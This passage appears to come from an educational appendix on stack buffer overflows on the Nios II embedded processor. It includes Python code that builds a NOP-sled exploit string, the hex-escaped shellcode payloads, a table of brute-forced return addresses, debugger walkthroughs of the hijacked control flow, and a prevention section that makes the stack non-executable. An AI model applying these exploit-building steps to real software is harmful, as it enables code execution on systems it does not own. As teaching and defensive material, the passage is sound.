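The lookup of the function address in the objdump listing, and its split into the two 16-bit immediates used above, can be sketched in Python. This is a hedged illustration: the listing excerpt is hypothetical (only the “critical_function” address comes from this tutorial; the “process_input” address is invented for the example), and it assumes the usual objdump label format of a hexadecimal address followed by the symbol in angle brackets.

```python
import re


def find_symbol_address(listing, symbol):
    """Return the address of `symbol` from objdump-style label lines."""
    pattern = re.compile(r"^([0-9a-fA-F]+) <%s>:" % re.escape(symbol), re.M)
    match = pattern.search(listing)
    return int(match.group(1), 16) if match else None


def split_halves(address):
    """Split a 32-bit address into its upper and lower 16-bit halves.

    The halves can be used directly as immediates only while the lower
    half is below 0x8000, because addi sign-extends its immediate.
    """
    return address >> 16, address & 0xFFFF


# Hypothetical excerpt of assembly.txt (label lines only).
SAMPLE_LISTING = """\
008002a8 <process_input>:
0080030c <critical_function>:
"""

address = find_symbol_address(SAMPLE_LISTING, "critical_function")
high, low = split_halves(address)
print("0x%08x -> high 0x%04x, low 0x%04x" % (address, high, low))
```

The two halves correspond to the immediates 0x0080 and 0x030c in the first two instructions of the table.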

The attacker first stores the value 0x0080030c in some register, say r5, and later uses the ‘callr’ assembly instruction, which transfers execution to the address contained in r5. Therefore the attacker has exploit code of length 12 bytes (3 instructions x 4 bytes per instruction), and the new return address requires 4 bytes. But the effective buffer length is 100 bytes. The remaining 84 (= 100 - 12 - 4) bytes can be filled with NOP instructions to form a NOP sled. This is illustrated below:

Using the NOP sled technique, it’s enough for the attacker to point the new return address anywhere into this NOP region. The processor will then slide to the exploit code. In this case 21 (= 84/4) NOP instructions can be accommodated. The total 100 bytes of the exploit string (i.e., the argument to the “process_input” function) is as shown next.


To supply a string in hexadecimal format as an input to C programs, we need to prefix each byte with the ‘\x’ escape sequence. For example, since the Nios II architecture is little endian [1], the equivalent input string for the ‘xor r5, r5, r5’ instruction is ‘\x3a\xf0\x4a\x29’. Hence the attacker input (i.e., exploit string) in this case is:

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\x10\xab\x81\x00
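The construction of the exploit string above can be sketched in Python. This is an illustrative sketch rather than the procedure used in the experiments: the three exploit words are copied byte-for-byte from the string above, the NOP word is the ‘xor r5, r5, r5’ encoding, and the function names are hypothetical.

```python
import struct

NOP_WORD = 0x294AF03A  # 'xor r5, r5, r5', used as the NOP
# Three exploit instruction words, copied from the string printed above.
EXPLOIT_WORDS = [0x01402034, 0x2940C304, 0x283EE83A]
BUFFER_LENGTH = 100    # effective buffer length in bytes


def build_exploit(return_address):
    """NOP sled + exploit code + return address, all little-endian."""
    body = struct.pack("<3I", *EXPLOIT_WORDS)
    sled_bytes = BUFFER_LENGTH - len(body) - 4
    sled = struct.pack("<I", NOP_WORD) * (sled_bytes // 4)
    return sled + body + struct.pack("<I", return_address)


def as_c_escapes(payload):
    """Format bytes as the \\xNN escapes accepted in a C string literal."""
    return "".join("\\x%02x" % b for b in payload)


payload = build_exploit(0x0081AB10)
print(as_c_escapes(payload))
```

Packing each word with the little-endian format reverses its byte order, which is why 0x294af03a appears in the string as \x3a\xf0\x4a\x29.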

Give the above string as an input to the “process_input” function, then compile and download the “Vulnerable_program” as done in Section A.2.1. The output of the program would be


Processing called function....!!

The above output indicates that the attack is not successful. This is because the guessed new return address “0x0081ab10” does not point into the NOP region. Since the exploit string has 21 NOPs, the attacker can increase (attempts 2, 4, 6, 8 and 10 in the table below) or decrease (attempts 3, 5, 7 and 9 in the table below) the address 0x0081ab10 in steps of 84 (= 21 x 4) bytes and test each result on the program as an estimated return address.

Attempt #    Estimated return address    Status of the exploit
1            0x0081ab10                  Fail
2            0x0081ab64                  Fail
3            0x0081aabc                  Fail
4            0x0081abb8                  Fail
5            0x0081aa68                  Fail
6            0x0081ac0c                  Fail
7            0x0081aa14                  Fail
8            0x0081ac60                  Fail
9            0x0081a9c0                  Fail
10           0x0081acb4                  Success
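The search order in the table can be reproduced with a short Python sketch. It is offered only as an illustration of the stepping pattern (alternately above and below the initial guess, in multiples of the sled length); the function name is hypothetical.

```python
def candidate_addresses(start, sled_bytes, attempts):
    """Return start, start+s, start-s, start+2s, start-2s, and so on."""
    candidates = [start]
    k = 1
    while len(candidates) < attempts:
        candidates.append(start + k * sled_bytes)
        if len(candidates) < attempts:
            candidates.append(start - k * sled_bytes)
        k += 1
    return candidates


for attempt, address in enumerate(candidate_addresses(0x0081AB10, 84, 10), 1):
    print("%2d  0x%08x" % (attempt, address))
```

Stepping by the full sled length means consecutive guesses on the same side never skip over the NOP region.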

The successful exploit string should have “0x0081acb4” as the new return address. The binary equivalent of the exploit string in this case is:


\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xb4\xac\x81\x00

Give the above string as an argument to “process_input” and compile the application. The output in this case will be:

Processing called function....!! Hacked: The flow has been successfully changed

To understand what really happened, we can use the “Debug” feature in the Nios II IDE. To debug the “Vulnerable_program”, right click on “Vulnerable_program” in the “Nios II C/C++ Projects” pane and select “Debug As => Nios II Hardware”. This opens the IDE in the “Debug” view as shown in Figure A.8.


Figure A.8: Nios II IDE Debug view

Now click on the Vulnerable_program.c tab and insert a breakpoint (by double clicking on the left border of the pane) at the “return” statement in this file. Run the program by clicking the button at the top left of the IDE, as shown by the red arrow in Figure A.9:

Figure A.9: Run the program in Debug view

The previous step runs the program until the “return” statement. Now click on the “Instruction Stepping Mode” button at the top of the IDE, as shown by the red arrow in Figure A.10:

Figure A.10: Instruction Stepping Mode

Instruction stepping mode shows the binary equivalent of Vulnerable_program.c and also provides an option to execute binary instructions one at a time using the “Step Into” mode. At this moment the processor’s program counter (PC) is at the function epilogue (refer to Chapter 2 for details) of the “process_input” function. The exact values of the PC and the stack pointer (SP) can be seen in the “Registers” pane at the top right, as shown in Figure A.11.

Figure A.11: Nios II register set


Click the “Step Into” button (Figure A.12, red arrow) four times to execute the “ret” instruction. This leads the PC to the exploit string instructions (supplied as an argument to “process_input” at the beginning of this section).

Figure A.12: Instruction step into mode

Now observe the register set and notice that the PC and SP are very close. This is because the PC is now pointing to the stack region which holds the exploit string. The reason is that the argument to the “process_input” function has overflowed into the return address (ra) part of the stack (refer to Chapter 2 for details). But the argument was carefully crafted to point the return address back into the stack buffer region (refer to Chapter 4 for details). At this moment the PC is ready to execute a series of “xor r5, r5, r5” instructions which are part of the NOP sled. Continue to “Step Into” until the PC reaches the “callr r5” instruction. This leads the PC to the “critical_function”, which was not supposed to be executed normally.

Now click “Run” as shown in Figure A.9 and observe the console output caused by the stack based buffer overflow.

A.3 Prevention

As seen in section A.2, the stack based buffer overflow attacks execute instructions in the function call stack region of the process memory. This can be prevented by not allowing the PC to fetch instructions from the function call stack region.


To do this, switch back to the “Nios II C/C++” view from the “Debug” view (if required, click the double arrows at the extreme top right corner). Right click on “Vulnerable_program” in the “Nios II C/C++ Projects” pane and select “System Library Properties”. Notice that the stack, text and other regions of the program memory space are allocated in the sdram memory (Figure A.13).

Figure A.13: Allocation of stack, text and other regions

The ‘Stack memory’ listed in Figure A.13 refers to the stacks created for tasks [7], not the function call stacks. Function call stacks come under the category ‘read/write data memory’ for the current system. Hence allocate the read/write data portion of the program to the SRAM using the dropdown menu in Figure A.13. Since the SRAM is connected to the data bus but not to the instruction bus (Section A.1), the PC will not be able to fetch instructions from the stack buffer.

As the attack is now effectively prevented, the NOP sled technique cannot be applied to find the effective buffer address. For demonstration purposes, the effective buffer address can instead be found from the register set (Figure A.11) and the “Memory” pane (Figure A.14). First run the “Vulnerable_program” in the Debug view with a breakpoint at the “return” statement (as done in section A.4). At this point, the Nios II register set shows the value of SP to be 0x2038d0. In the “Memory” pane (Figure A.14), add a monitor for 0x2038d0 by clicking the “+” sign. This displays the memory contents near this address. Careful observation shows that the exploit string of section A.4 starts at 0x2038d4 (Figure A.15).

Figure A.14: Memory monitor addition


Figure A.15: Exploit string in the memory

Hence modify the return address (the last four bytes) of the exploit string of section A.4 to obtain the following:

\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a \xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0 \x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a \x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29\x3a\xf0\x4a\x29 \x34\x20\x40\x01\x04\xc3\x40\x29\x3a\xe8\x3e\x28\xd4\x38\x20\x00

Give the above string as input to the “process_input” function and rerun the “Vulnerable_program” in the Debug view with a breakpoint at the “return” statement. Switch to “Instruction Stepping Mode” (Figure A.10, red arrow) and “Step Into” (Figure A.12, red arrow) four times to execute the “ret” instruction. Select the “Trace” pane (near the “Registers” pane, Figure A.16) and continue to “Step Into”. The “Trace” pane now displays messages such as “ERROR: address 2038d4 not in Memory” (Figure A.16): the PC cannot fetch an instruction from the stack buffer, which implies that the attack is unsuccessful.


Figure A.16: Instruction trace showing error in execution
